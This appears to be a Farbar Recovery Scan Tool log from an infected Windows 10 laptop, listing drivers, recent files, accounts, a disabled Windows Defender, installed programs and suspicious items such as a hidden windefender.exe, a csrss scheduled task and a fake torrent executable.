S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [420832 2017-09-21] (Realtek Semiconductor Corp. -> Realsil Semiconductor Corporation)
R3 RTWlanE; C:\WINDOWS\System32\drivers\rtwlane.sys [11722328 2019-12-04] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation )
R3 SmbDrv; C:\WINDOWS\system32\DRIVERS\Smb_driver_AMDASF.sys [48688 2019-08-15] (Synaptics Incorporated -> Synaptics Incorporated)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [46472 2019-04-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [344544 2019-04-24] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [60896 2019-04-24] (Microsoft Windows -> Microsoft Corporation)
R3 WirelessButtonDriver64; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [35392 2019-11-15] (HP Inc. -> HP)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-02-25 22:17 - 2020-02-25 22:23 - 000028312 _____ C:\Users\OKAY\Desktop\FRST.txt
2020-02-25 22:13 - 2020-02-25 22:21 - 000000000 ____D C:\FRST
2020-02-25 22:11 - 2020-02-25 22:11 - 002279424 _____ (Farbar) C:\Users\OKAY\Desktop\FRST64.exe
2020-02-25 17:07 - 2020-02-25 17:07 - 000004454 _____ C:\WINDOWS\system32\Tasks\Opera scheduled assistant Autoupdate 1559853232
2020-02-11 17:48 - 2020-02-11 17:48 - 000000000 ____D C:\Users\OKAY\AppData\Roaming\EpicNet Inc
2020-02-11 14:17 - 2020-02-24 09:21 - 000003582 _____ C:\WINDOWS\system32\Tasks\ScheduledUpdate
2020-02-11 14:17 - 2020-02-24 09:21 - 000003266 _____ C:\WINDOWS\system32\Tasks\csrss
2020-02-11 14:17 - 2020-02-11 14:17 - 002079744 ____H C:\WINDOWS\windefender.exe
2020-02-11 14:16 - 2020-02-11 14:16 - 000000000 ___HD C:\WINDOWS\rss
2020-02-11 14:14 - 2020-02-11 14:14 - 003964928 _____ C:\Users\OKAY\Downloads\Rammstein+torrent+download+discography-RTMD-AMSoQl4obgAAjRsCAFNLFwAGAKoP4kkA.exe
2020-02-11 14:07 - 2020-02-16 17:32 - 000000000 ____D C:\Users\OKAY\AppData\LocalLow\uTorrent
2020-02-11 14:07 - 2020-02-16 16:28 - 000000000 ____D C:\Users\OKAY\AppData\Local\BitTorrentHelper
2020-02-11 14:07 - 2020-02-11 14:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-02-11 14:06 - 2020-02-11 14:06 - 000000000 ____D C:\Users\OKAY\AppData\Roaming\Lavasoft
2020-02-11 14:06 - 2020-02-11 14:06 - 000000000 ____D C:\Users\OKAY\AppData\Local\Lavasoft
2020-02-11 14:06 - 2020-02-11 14:06 - 000000000 ____D C:\ProgramData\Lavasoft
2020-02-11 14:06 - 2020-02-11 14:06 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2020-02-11 14:03 - 2020-02-11 14:03 - 003159664 _____ (BitTorrent Inc.) C:\Users\OKAY\Downloads\uTorrent.exe
2020-02-06 09:36 - 2020-02-06 10:14 - 422494755 _____ C:\Users\OKAY\Downloads\Prodigy-2018-The Total Best Of.zip
2020-02-05 20:09 - 2020-02-05 20:33 - 446248396 _____ C:\Users\OKAY\Downloads\Best of Chill 2019 (Mp3 320kbps Songs) [PMEDIA]

.7z
2020-02-05 20:00 - 2020-02-05 20:00 - 000000690 _____ C:\Users\OKAY\Desktop\Total Commander 64 bit.lnk
2020-02-05 20:00 - 2020-02-05 20:00 - 000000000 ____D C:\Users\OKAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Total Commander
2020-02-05 20:00 - 2020-02-05 20:00 - 000000000 ____D C:\Users\OKAY\AppData\Roaming\GHISLER
2020-02-05 20:00 - 2020-02-05 20:00 - 000000000 ____D C:\Users\OKAY\AppData\Local\GHISLER
2020-02-05 20:00 - 2020-02-05 20:00 - 000000000 ____D C:\totalcmd
2020-02-05 19:33 - 2020-02-05 19:36 - 063660981 _____ C:\Users\OKAY\Downloads\SMOKIE - Best of (mp3jamboo68).rar
2020-02-05 19:25 - 2020-02-05 19:29 - 069540712 _____ C:\Users\OKAY\Downloads\Depeche Mode - Best Of-mnl-.rar
2020-02-04 12:18 - 2020-02-04 12:41 - 414575783 _____ C:\Users\OKAY\Downloads\Gammaray-diskografie.rar
2020-02-04 12:14 - 2020-02-04 15:44 - 3812296958 _____ C:\Users\OKAY\Downloads\Mac a já (1988) 1080p CZ Dabing.mkv
2020-02-04 12:01 - 2020-02-04 12:03 - 000000095 _____ C:\WINDOWS\winamp.ini
2020-02-04 12:01 - 2020-02-04 12:01 - 000000000 ____D C:\Users\OKAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Winamp
2020-02-04 12:01 - 2020-02-04 12:01 - 000000000 ____D C:\Program Files (x86)\Winamp
2020-02-04 11:17 - 2020-02-04 11:17 - 000000000 ____D C:\Users\OKAY\Desktop\Zložky
2020-01-29 22:45 - 2020-01-29 22:46 - 000517110 _____ C:\Users\OKAY\Downloads\gens+00961.zip
2020-01-29 22:39 - 2020-01-29 22:40 - 000586839 _____ C:\Users\OKAY\Downloads\gens-win32-bin-2.14.zip

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-02-25 22:36 - 2019-03-19 05:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-02-25 22:35 - 2019-09-10 00:21 - 000004210 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{1D0EBB06-013E-4F66-A1F3-DAAE07C732DD}
2020-02-25 21:20 - 2019-09-09 23:51 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-02-25 17:19 - 2018-06-04 17:13 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-02-25 17:04 - 2019-06-08 20:48 - 000000000 ____D C:\Users\OKAY\Downloads\opera autoupdate
2020-02-24 11:36 - 2019-03-19 05:50 - 000000000 ____D C:\WINDOWS\INF
2020-02-21 20:37 - 2019-03-19 05:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-02-21 20:37 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-02-17 00:29 - 2018-02-23 14:02 - 000000000 ____D C:\Users\OKAY\AppData\Local\PlaceholderTileLogoFolder
2020-02-17 00:27 - 2019-09-10 00:02 - 000000000 ____D C:\Users\OKAY
2020-02-17 00:26 - 2019-09-10 00:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-02-16 17:35 - 2019-03-19 05:37 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2020-02-16 17:35 - 2018-01-05 09:33 - 000065536 _____ C:\WINDOWS\psp_storage.bin
2020-02-16 14:45 - 2018-08-10 12:03 - 000000000 ____D C:\Users\OKAY\AppData\Roaming\vlc
2020-02-16 14:34 - 2019-03-19 05:52 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2020-02-10 19:14 - 2019-09-10 00:21 - 000004214 _____ C:\WINDOWS\system32\Tasks\Opera scheduled Autoupdate 1557961584
2020-02-10 19:14 - 2019-09-10 00:21 - 000003378 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3379079519-2247991655-2019407835-1001
2020-02-10 19:14 - 2019-09-10 00:02 - 000002359 _____ C:\Users\OKAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-02-10 19:14 - 2019-06-06 21:33 - 000001407 _____ C:\Users\OKAY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Prehliadač Opera.lnk
2020-02-10 19:14 - 2018-02-23 13:43 - 000000000 ___RD C:\Users\OKAY\OneDrive
2020-02-05 17:17 - 2019-09-10 00:21 - 000003458 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-02-05 17:17 - 2019-09-10 00:21 - 000003334 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-02-04 12:24 - 2018-02-23 13:39 - 000000000 ____D C:\Users\OKAY\AppData\Local\Packages
2020-02-04 12:03 - 2018-02-23 13:39 - 000000000 ____D C:\Users\OKAY\AppData\Local\VirtualStore
2020-02-04 11:19 - 2018-06-22 16:09 - 000000000 ____D C:\Games
2020-02-01 19:39 - 2019-08-15 19:59 - 000000000 ___DC C:\WINDOWS\Panther
2020-02-01 19:39 - 2018-11-10 22:55 - 000000000 ____D C:\Users\OKAY\AppData\Local\CrashDumps

==================== Files in the root of some directories ========

2019-06-06 20:08 - 2019-07-28 18:06 - 000000037 _____ () C:\Users\OKAY\AppData\Roaming\WB.CFG
2019-06-10 00:58 - 2019-06-10 00:58 - 000000000 _____ () C:\Users\OKAY\AppData\Local\BIT129D.tmp
2019-06-10 00:58 - 2019-06-10 00:58 - 000000000 _____ () C:\Users\OKAY\AppData\Local\BIT12BD.tmp
2018-07-22 12:26 - 2018-07-22 12:26 - 000007597 _____ () C:\Users\OKAY\AppData\Local\Resmon.ResmonCfg
2019-07-10 15:40 - 2019-07-10 15:40 - 000000000 _____ () C:\Users\OKAY\AppData\Local\{7D1F4715-72F8-4A74-98E7-35C37B79A5E6}

==================== SigCheckExt =========================

2018-01-05 09:36 - 2017-08-28 09:54 - 000050960 _____ C:\WINDOWS\system32\rtl8723b_mp_chip_bt40_fw_asic_rom_patch_new.dll
2018-01-05 09:36 - 2013-04-01 23:19 - 000574464 _____ (Realtek Semiconductor Corp. ) C:\WINDOWS\system32\rtl8723de.dll
2018-01-05 09:36 - 2017-08-28 09:54 - 000054192 _____ C:\WINDOWS\system32\rtl8723d_mp_chip_bt40_fw_asic_rom_patch_new.dll
2018-01-05 09:36 - 2017-08-28 09:54 - 000039420 _____ C:\WINDOWS\system32\rtl8821c_mp_chip_bt40_fw_asic_rom_patch_new.dll
2018-01-05 09:36 - 2017-08-28 09:54 - 000046708 _____ C:\WINDOWS\system32\rtl8822b_mp_chip_bt40_fw_asic_rom_patch_new.dll
2017-01-27 23:01 - 2017-01-27 23:01 - 000322560 _____ C:\WINDOWS\system32\vulkan-1-1-0-39-1.dll
2017-01-27 23:02 - 2017-01-27 23:02 - 000118272 _____ C:\WINDOWS\system32\vulkaninfo-1-1-0-39-1.exe
2017-11-11 11:54 - 2018-04-23 14:12 - 000014848 _____ (Hewlett-Packard) C:\WINDOWS\HPCUST2.exe
2018-01-05 09:36 - 2016-09-20 19:00 - 000001156 _____ C:\WINDOWS\PidVid_List.dll
2020-02-11 14:17 - 2020-02-11 14:17 - 002079744 ____H C:\WINDOWS\windefender.exe
2018-01-05 09:36 - 2010-12-01 09:31 - 000451072 _____ C:\WINDOWS\SysWOW64\ISSRemoveSP.exe
2019-05-15 18:35 - 2003-03-18 21:14 - 000499712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp71.dll
2019-05-15 18:35 - 2003-02-21 03:42 - 000348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr71.dll
2017-01-27 23:04 - 2017-01-27 23:04 - 000326656 _____ C:\WINDOWS\SysWOW64\vulkan-1-1-0-39-1.dll
2017-01-27 23:05 - 2017-01-27 23:05 - 000103936 _____ C:\WINDOWS\SysWOW64\vulkaninfo-1-1-0-39-1.exe
2020-02-25 22:11 - 2020-02-25 22:11 - 002279424 _____ (Farbar) C:\Users\OKAY\Desktop\FRST64.exe
2018-06-05 15:05 - 2018-06-05 15:05 - 063070677 _____ () C:\Users\OKAY\Downloads\csm_setup.exe
2019-05-15 23:58 - 2019-05-15 23:58 - 002152464 _____ (Timehoram ) C:\Users\OKAY\Downloads\hdtv_usb_dvb_t2_driver_setup5599_1109927386.exe
2020-02-11 14:14 - 2020-02-11 14:14 - 003964928 _____ C:\Users\OKAY\Downloads\Rammstein+torrent+download+discography-RTMD-AMSoQl4obgAAjRsCAFNLFwAGAKoP4kkA.exe

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23-02-2020
Ran by OKAY (25-02-2020 22:40:44)
Running from C:\Users\OKAY\Desktop
Windows 10 Home Version 1903 18362.592 (X64) (2019-09-09 23:23:00)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3379079519-2247991655-2019407835-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3379079519-2247991655-2019407835-503 - Limited - Disabled)
Guest (S-1-5-21-3379079519-2247991655-2019407835-501 - Limited - Disabled)
OKAY (S-1-5-21-3379079519-2247991655-2019407835-1001 - Administrator - Enabled) => C:\Users\OKAY
WDAGUtilityAccount (S-1-5-21-3379079519-2247991655-2019407835-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

AMD Radeon Settings (HKLM\...\WUCCCApp) (Version: 2018.0402.145.1339 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 17.7 - Advanced Micro Devices, Inc.)
ANT Drivers Installer x64 (HKLM\...\{C14C3A1D-B5B3-41BB-9358-6FEA3FC642AF}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
ArcSoft TotalMedia 3.5 (HKLM-x32\...\{29E44E9D-ACB2-4D2D-849F-5361C941B7E1}) (Version: 3.5.7.331 - ArcSoft)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Booking (HKLM-x32\...\{13D4CD54-EA09-4FDB-B979-8B2BC0F020CA}_is1) (Version: 2.0.701 - Booking)
Catalyst Control Center Next Localization BR (HKLM\...\{6EF6941D-4393-2231-3D29-C52ED8ED485F}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (HKLM\...\{7784F531-3276-EBB5-F590-F62151FE39A9}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (HKLM\...\{BEBEB9E8-D83E-FC1A-6EB4-EA3609DA4967}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (HKLM\...\{DE06415A-00C1-CA00-082B-693F3F04D9E9}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (HKLM\...\{19C0293F-9157-3931-F773-64F879906064}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (HKLM\...\{58C33198-3421-5C93-2993-B69796CD64FC}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (HKLM\...\{3FB42013-DFEA-42C7-2409-2A993F0A125F}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (HKLM\...\{E42B85E8-5E5C-F890-A943-CA53E9212DB0}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (HKLM\...\{45571752-4A06-D0B6-9626-AA42F733F06A}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (HKLM\...\{01ED4501-7134-67E5-0AF0-3B6003646E1A}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (HKLM\...\{FDFEBDEA-140C-AF32-5D1D-D85858CF589D}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (HKLM\...\{7EC80E29-C710-843D-AEF8-3E03473D0166}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (HKLM\...\{6DF59C47-EAA3-09D8-E1A1-ADF4ADD66771}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (HKLM\...\{DB3312FA-CD19-EDF6-1DDE-A53A796991B5}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (HKLM\...\{625D3128-2C37-F193-1346-0727DD1E6E96}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (HKLM\...\{CBD24DD2-87EF-84C3-CE61-7ACF33779AFA}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (HKLM\...\{08AE5F97-73E6-2049-1976-12C786CD1828}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (HKLM\...\{48ACCBEA-F85D-0908-24D6-A8DDBE0621C2}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{86521D14-67A5-D13B-44DD-64E3BDBEE245}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{EEB0FB79-C020-3725-867E-6FF3EA0782A1}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{B1DE4F1A-449C-75A6-16D1-CB7B6BCE526C}) (Version: 2017.0925.532.8136 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.48 - Piriform)
CloudNet (HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Czech Soccer Manager (HKLM-x32\...\Czech Soccer Manager) (Version: - )
Elevated Installer (HKLM-x32\...\{B11981DA-5AEA-459F-978A-F99541F77AD5}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.)
Facebook Gameroom 1.21.6697.19829 (HKLM-x32\...\{7BE2211B-F86C-40CA-A6CC-69564D9BD5E2}) (Version: 1.21.6697.19829 - Facebook)
Garmin Express (HKLM-x32\...\{4cc2749e-1c2a-4f48-abdf-c17069bac4da}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{9BE7B09F-C8D2-4B1E-B83E-7387FDDA8BCD}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 79.0.3945.130 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.441 - Google LLC) Hidden
HP Audio Switch (HKLM-x32\...\{BC852AA8-58F6-4F07-ACB1-7377E52CA4F3}) (Version: 1.0.150.0 - HP Inc.)
HP Connection Optimizer (HKLM-x32\...\{6468C4A5-E47E-405F-B675-A70A70983EA6}) (Version: 2.0.9.0 - HP Inc.)
HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.)
HP ePrint SW (HKLM-x32\...\{cdb5f70f-5107-4613-bf69-15de903b5b5d}) (Version: 5.5.22560 - HP Inc.)
HP JumpStart Bridge (HKLM-x32\...\{3FC961DB-BD36-4D8D-B276-0C456A2BB638}) (Version: 1.4.0.441 - HP Inc.)
HP JumpStart Launch (HKLM-x32\...\{F213102E-FD30-4E22-AF73-4C682D65FFEE}) (Version: 1.4.441.0 - HP Inc.)
HP Support Solutions Framework (HKLM-x32\...\{4E100CB6-9312-48BC-9DC0-4F4D5C338449}) (Version: 12.14.49.15 - HP Inc.)
HP System Event Utility (HKLM-x32\...\{4B0A7A8A-ECE5-4639-9A0D-C535F354313D}) (Version: 1.4.26 - HP Inc.)
HP Wireless Button Driver (HKLM-x32\...\{119A6F59-D6D4-4091-A593-019EB9C9300E}) (Version: 1.1.22.1 - HP)
Charity Engine (HKLM\...\{A7D31CBC-80AF-4E68-83D7-20D01917C034}) (Version: 7.6.33 - Charity Engine)
IRRecevie (HKLM-x32\...\{F6BC20A5-3C48-4675-BDE6-E2E6FED30B9D}) (Version: 1.00.0000 - Mygica)
IT9130 Driver v12.2.3.1 (HKLM-x32\...\IT9130 DriverInstaller_12.2.3.1) (Version: - )
KMPlayer (HKLM-x32\...\The KMPlayer) (Version: 4.0.6.4 - PandoraTV)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.0.92 - McAfee, LLC.)
Microsoft Office 365 - sk-sk (HKLM\...\o365homepremretail - sk-sk) (Version: 16.0.12430.20288 - Microsoft Corporation)
Microsoft Office 365 Business - sk-sk (HKLM\...\O365BusinessRetail - sk-sk) (Version: 16.0.12430.20288 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\OneDriveSetup.exe) (Version: 19.232.1124.0005 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24123 (HKLM-x32\...\{2cbcedbb-f38c-48a3-a3e1-6c6fd821a7f4}) (Version: 14.0.24123.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24123 (HKLM-x32\...\{206898cc-4b41-4d98-ac28-9f9ae57f91fe}) (Version: 14.0.24123.0 - Microsoft Corporation)
OEM Application Profile (HKLM-x32\...\{12C2AEB0-ED60-4CCF-DD83-C65BC7CCFB50}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12430.20288 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12430.20288 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12430.20264 - Microsoft Corporation) Hidden
Opera Stable 66.0.3515.72 (HKU\S-1-5-21-3379079519-2247991655-2019407835-1001\...\Opera 66.0.3515.72) (Version: 66.0.3515.72 - Opera Software)
Oracle VM VirtualBox 5.2.6 (HKLM\...\{EA9602E3-0184-45B9-9E15-028776CD7A6E}) (Version: 5.2.6 - Oracle Corporation)
REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (Version: 1.0.0.79 - REALTEK Semiconductor Corp.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.15063.31235 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.21.811.2017 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8734.1 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.0.0.104 - REALTEK Semiconductor Corp.)
Teams Machine-Wide Installer (HKLM-x32\...\{39AF0813-FA7B-4860-ADBE-93B9B214B914}) (Version: 1.2.0.17057 - Microsoft Corporation)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.22a - Ghisler Software GmbH)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.3 - VideoLAN)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Warcraft III - The Frozen Throne v1.26 (HKLM-x32\...\Warcraft III - The Frozen Throne v1.26 1.26) (Version: 1.26 - Blizzard)
Warface (HKLM-x32\...\Warface) (Version: - )
Web Companion (HKLM-x32\...\{e1d70393-2c6e-44ab-a361-dc4b5122f2d3}) (Version: 4.9.2182.4042 - Lavasoft)
Winamp (remove only) (HKLM-x32\...\Winamp) (Version: - )
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

Packages:
=========
9 zip -> C:\Program Files\WindowsApps\184MagikHub.9zip_3.3.66.0_x64__hvr7qkvwfhvx6 [2020-01-10] (Magik Hub) [MS Ad]
ACG Player -> C:\Program Files\WindowsApps\41038AXILESOFT.ACGMEDIAPLAYER_1.15.17502.0_x64__wxjjre7dryqb6 [2019-05-07] (Axilesoft) [MS Ad]
Adobe Reader Touch -> C:\Program Files\WindowsApps\AdobeSystemsIncorporated.AdobeReader_3.1.8.7675_x86__ynb6jyjzte8ga [2018-06-06] (Adobe Systems Incorporated)
Amazon -> C:\Program Files\WindowsApps\Amazon.com.Amazon_2018.519.2811.0_x64__343d40qqvtj1t [2018-07-05] (Amazon.com)
Autodesk SketchBook -> C:\Program Files\WindowsApps\89006A2E.AutodeskSketchBook_5.1.0.0_x64__tf1gferkr813w [2019-11-05] (Autodesk Inc.)
Booking.com: Big savings on hotels in 96,000 destinations worldwide -> C:\Program Files\WindowsApps\PricelinePartnerNetwork.Booking.comBigsavingsonhot_1.4.4.0_x64__mgae2k3ys4ra0 [2018-11-07] (Priceline Partner Network)
